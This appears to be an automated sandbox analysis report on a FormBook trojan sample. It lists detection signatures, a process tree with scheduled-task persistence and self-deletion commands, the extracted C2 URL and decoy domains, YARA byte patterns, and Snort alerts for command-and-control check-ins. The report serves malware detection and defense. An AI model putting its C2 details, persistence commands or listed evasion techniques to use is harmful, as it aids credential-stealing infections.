Play interactive tour

Edit tour

Windows Analysis Report tgamf4XuLa

Overview

General Information

Sample Name:	tgamf4XuLa (renamed file extension from none to exe)
Analysis ID:	483617
MD5:	f8146a71dedc3eeeaa1624d6832c39a4
SHA1:	b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256:	3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

tgamf4XuLa.exe (PID: 6056 cmdline: 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F8146A71DEDC3EEEAA1624D6832C39A4)

schtasks.exe (PID: 5080 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

tgamf4XuLa.exe (PID: 1956 cmdline: C:\Users\user\Desktop\tgamf4XuLa.exe MD5: F8146A71DEDC3EEEAA1624D6832C39A4)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 6428 cmdline: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x66b9:$sqlite3step: 68 34 1C 7B E1 0x67cc:$sqlite3step: 68 34 1C 7B E1 0x66e8:$sqlite3text: 68 38 2A 90 C5 0x680d:$sqlite3text: 68 38 2A 90 C5 0x66fb:$sqlite3blob: 68 53 D8 7F 8C 0x6823:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x80920:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x80cba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7d40:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa80da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8c9cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb3ded:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8c4b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb38d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8cacf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb3eef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8cc47:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb4067:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x816d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa8af2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8b734:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb2b54:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8244a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xa986a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x91abf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb8edf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x92b62:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8e9f1:$sqlite3step: 68 34 1C 7B E1 0x8eb04:$sqlite3step: 68 34 1C 7B E1 0xb5e11:$sqlite3step: 68 34 1C 7B E1 0xb5f24:$sqlite3step: 68 34 1C 7B E1 0x8ea20:$sqlite3text: 68 38 2A 90 C5 0x8eb45:$sqlite3text: 68 38 2A 90 C5 0xb5e40:$sqlite3text: 68 38 2A 90 C5 0xb5f65:$sqlite3text: 68 38 2A 90 C5 0x8ea33:$sqlite3blob: 68 53 D8 7F 8C 0x8eb5b:$sqlite3blob: 68 53 D8 7F 8C 0xb5e53:$sqlite3blob: 68 53 D8 7F 8C 0xb5f7b:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x66b9:$sqlite3step: 68 34 1C 7B E1 0x67cc:$sqlite3step: 68 34 1C 7B E1 0x66e8:$sqlite3text: 68 38 2A 90 C5 0x680d:$sqlite3text: 68 38 2A 90 C5 0x66fb:$sqlite3blob: 68 53 D8 7F 8C 0x6823:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: tgamf4XuLa.exe PID: 6056	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.tgamf4XuLa.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.tgamf4XuLa.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.tgamf4XuLa.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
6.2.tgamf4XuLa.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.tgamf4XuLa.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.tgamf4XuLa.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: tgamf4XuLa.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\HpnpObXJP.exe

Joe Sandbox ML: detected

Source: 6.2.tgamf4XuLa.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: tgamf4XuLa.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: tgamf4XuLa.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
Source:	Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 4x nop then pop edi		6_2_00415691
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi		20_2_02ED5691

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tjandamber.com
Source: C:\Windows\explorer.exe	Domain query: www.fraktal.media
Source: C:\Windows\explorer.exe	Domain query: www.expertexceleratorchallenge.com
Source: C:\Windows\explorer.exe	Network Connect: 52.25.92.0 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80	Jump to behavior
